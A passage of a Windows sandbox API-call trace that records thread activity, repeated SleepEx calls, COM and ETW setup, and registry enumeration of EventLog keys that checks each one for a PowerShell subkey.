bAlertable=0) returned 0x0 [0224.626] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0224.661] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0224.742] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0224.970] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0225.055] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0225.132] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0225.226] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0225.320] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0225.414] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0225.463] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0225.514] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0225.555] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0225.617] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.309] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.335] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.338] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.338] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.339] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.339] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.339] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.340] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.340] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.340] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.340] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.341] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.341] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.341] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.342] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.342] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.342] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.342] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.343] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.343] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.343] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.344] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.344] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.344] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.344] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.677] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.677] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.678] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.678] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.678] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.678] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.678] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.679] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.679] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.679] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.679] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.679] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.680] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.680] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.680] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.680] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.680] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.681] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.681] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.681] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.681] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.681] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.682] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.682] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.682] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 Thread: id = 24 os_tid = 0x11c4 [0125.802] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0125.835] CoGetContextToken (in: pToken=0x74cf504 | out: pToken=0x74cf504) returned 0x0 [0125.835] CObjectContext::QueryInterface () returned 0x0 [0125.835] CObjectContext::GetCurrentThreadType () returned 0x0 [0125.835] Release () returned 0x0 [0125.835] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0125.835] CoUninitialize () [0125.835] RoInitialize () returned 0x1 [0125.835] RoUninitialize () returned 0x0 [0125.836] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0126.056] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0126.207] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0126.426] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0126.586] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0126.724] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0126.902] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0127.209] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0127.360] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0127.468] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0127.620] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0127.709] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0127.803] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0127.902] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0128.156] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0129.183] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0129.342] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0129.698] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0129.787] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0129.865] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0130.019] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0130.190] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0130.462] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0130.531] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0130.636] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0130.681] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0130.871] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0130.911] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0131.011] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0131.057] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0131.099] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0131.149] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0131.208] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0131.271] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0131.317] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0131.369] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0131.411] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0131.479] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0131.638] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0131.885] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0131.965] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0132.011] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0132.117] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0132.168] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0132.325] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0132.364] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0132.366] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0132.371] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0132.376] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0132.379] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0133.974] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.073] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.135] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.199] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.244] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.290] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.340] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.399] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.447] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.494] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.495] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.497] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.498] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.498] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.499] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.499] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.515] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.515] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.524] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.572] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.574] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.575] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.575] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.577] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.578] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.578] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.581] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.582] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.583] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.583] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.584] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.586] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.587] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.604] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.606] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.606] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.607] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.607] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.608] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.609] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.609] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.610] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.610] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.610] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.611] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.611] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.613] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.614] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.614] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.615] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0137.580] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0137.736] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0137.946] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0138.053] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0138.154] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0138.263] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0138.444] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0138.563] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0138.678] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0138.759] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0138.912] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.009] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.115] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.164] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.243] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.287] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.345] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.385] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.428] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.491] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.536] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.584] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.632] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.678] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.725] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0159.795] CoUninitialize () Thread: id = 25 os_tid = 0x11a0 Thread: id = 26 os_tid = 0x11bc Thread: id = 29 os_tid = 0x520 Thread: id = 30 os_tid = 0x4e4 Thread: id = 31 os_tid = 0xd04 [0146.010] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0146.010] CoGetContextToken (in: pToken=0x7aaf3bc | out: pToken=0x7aaf3bc) returned 0x0 [0146.010] CObjectContext::QueryInterface () returned 0x0 [0146.010] CObjectContext::GetCurrentThreadType () returned 0x0 [0146.010] Release () returned 0x0 [0146.010] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0146.010] CoUninitialize () [0146.010] RoInitialize () returned 0x1 [0146.010] RoUninitialize () returned 0x0 Thread: id = 32 os_tid = 0x778 [0146.054] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0146.054] RoInitialize () returned 0x1 [0146.054] RoUninitialize () returned 0x0 [0146.195] GetCurrentProcessId () returned 0x1064 [0147.153] EtwEventWriteTransfer (RegHandle=0x31da328, EventDescriptor=0x2e, ActivityId=0x7b2f38c, RelatedActivityId=0x7b2f33c, UserDataCount=0x0, UserData=0x8) returned 0x0 [0147.153] EtwEventWriteTransfer (RegHandle=0x31da328, EventDescriptor=0x2e, ActivityId=0x7b2f3b8, RelatedActivityId=0x7b2f368, UserDataCount=0x0, UserData=0x2) returned 0x0 [0147.155] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x66c [0147.160] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Threading.OverlappedData_Disabled", lpBuffer=0x7b2eaec, nSize=0x80 | out: lpBuffer="က牘\x01") returned 0x0 [0147.160] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Threading.OverlappedData_MinCount", lpBuffer=0x7b2eaec, nSize=0x80 | out: lpBuffer="က牘\x01") returned 0x0 [0147.164] EtwEventRegister (in: ProviderId=0x53d205c, EnableCallback=0x5072cf6, CallbackContext=0x0, RegHandle=0x53d2038 | out: RegHandle=0x53d2038) returned 0x0 [0147.164] EtwEventSetInformation (RegHandle=0x75e8bf8, InformationClass=0x50, EventInformation=0x2, InformationLength=0x53d2000) returned 0x0 [0147.167] ConnectNamedPipe (in: hNamedPipe=0x634, lpOverlapped=0x53d2244 | out: lpOverlapped=0x53d2244) returned 0 Thread: id = 33 os_tid = 0x794 Thread: id = 34 os_tid = 0x1124 [0168.292] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0168.292] CoGetContextToken (in: pToken=0x7c2f9f4 | out: pToken=0x7c2f9f4) returned 0x0 [0168.292] CObjectContext::QueryInterface () returned 0x0 [0168.292] CObjectContext::GetCurrentThreadType () returned 0x0 [0168.292] Release () returned 0x0 [0168.292] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0168.292] CoUninitialize () [0168.292] RoInitialize () returned 0x1 [0168.292] RoUninitialize () returned 0x0 [0168.293] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.294] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.294] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.294] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.295] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.295] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.295] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.295] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.295] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.296] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.296] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.296] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.296] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.296] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.297] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.297] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.297] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.297] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.297] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.298] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.298] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.298] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.298] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.298] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.299] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.299] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.299] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.301] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.322] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.323] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.324] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.325] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.325] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.325] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.326] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.326] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.326] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.326] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.327] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.327] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.327] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.327] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.328] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.328] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.328] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.329] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.329] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.329] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.329] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.330] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0180.098] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7c2ebb0, nSize=0x80 | out: lpBuffer="က澪က澪") returned 0x0 [0181.641] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7c2ea7c, nSize=0x80 | out: lpBuffer="߂籶玥᝹က澪က澪") returned 0x0 [0181.833] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f37c | out: phkResult=0x7c2f37c*=0x378) returned 0x0 [0181.835] RegQueryInfoKeyW (in: hKey=0x378, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x7c2f3cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x7c2f3c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x7c2f3cc*=0x8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x7c2f3c8*=0x13, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0181.835] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x0, lpName=0x54c0e40, lpcchName=0x7c2f3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x7c2f3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0181.835] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x1, lpName=0x54c0e40, lpcchName=0x7c2f3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x7c2f3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0181.835] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x2, lpName=0x54c0e40, lpcchName=0x7c2f3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x7c2f3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0181.835] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x3, lpName=0x54c0e40, lpcchName=0x7c2f3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x7c2f3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0181.836] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x4, lpName=0x54c0e40, lpcchName=0x7c2f3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x7c2f3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0181.836] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x5, lpName=0x54c0e40, lpcchName=0x7c2f3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x7c2f3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0181.836] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x6, lpName=0x54c0e40, lpcchName=0x7c2f3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x7c2f3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0181.836] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x7, lpName=0x54c0e40, lpcchName=0x7c2f3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x7c2f3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0181.836] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f3a8 | out: phkResult=0x7c2f3a8*=0x438) returned 0x0 [0181.836] RegOpenKeyExW (in: hKey=0x438, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f3a8 | out: phkResult=0x7c2f3a8*=0x0) returned 0x2 [0181.836] RegCloseKey (hKey=0x438) returned 0x0 [0181.836] RegOpenKeyExW (in: hKey=0x378, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f3a8 | out: phkResult=0x7c2f3a8*=0x438) returned 0x0 [0181.836] RegOpenKeyExW (in: hKey=0x438, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f3a8 | out: phkResult=0x7c2f3a8*=0x0) returned 0x2 [0181.837] RegCloseKey (hKey=0x438) returned 0x0 [0181.837] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f3a8 | out: phkResult=0x7c2f3a8*=0x438) returned 0x0 [0181.837] RegOpenKeyExW (in: hKey=0x438, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f3a8 | out: phkResult=0x7c2f3a8*=0x0) returned 0x2 [0181.837] RegCloseKey (hKey=0x438) returned 0x0 [0181.837] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f3a8 | out: phkResult=0x7c2f3a8*=0x438) returned 0x0 [0181.838] RegOpenKeyExW (in: hKey=0x438, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f3a8 | out: phkResult=0x7c2f3a8*=0x0) returned 0x2 [0181.838] RegCloseKey (hKey=0x438) returned 0x0 [0181.838] RegOpenKeyExW (in: hKey=0x378, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f3a8 | out: phkResult=0x7c2f3a8*=0x438) returned 0x0 [0181.838] RegOpenKeyExW (in: hKey=0x438, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f3a8 | out: phkResult=0x7c2f3a8*=0x0) returned 0x2 [0181.838] RegCloseKey (hKey=0x438) returned 0x0 [0181.838] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f3a8 | out: phkResult=0x7c2f3a8*=0x438) returned 0x0 [0181.838] RegOpenKeyExW (in: hKey=0x438, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f3a8 | out: phkResult=0x7c2f3a8*=0x0) returned 0x2 [0181.839] RegCloseKey (hKey=0x438) returned 0x0 [0181.839] RegOpenKeyExW (in: hKey=0x378, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f3a8 | out: phkResult=0x7c2f3a8*=0x438) returned 0x0 [0181.839] 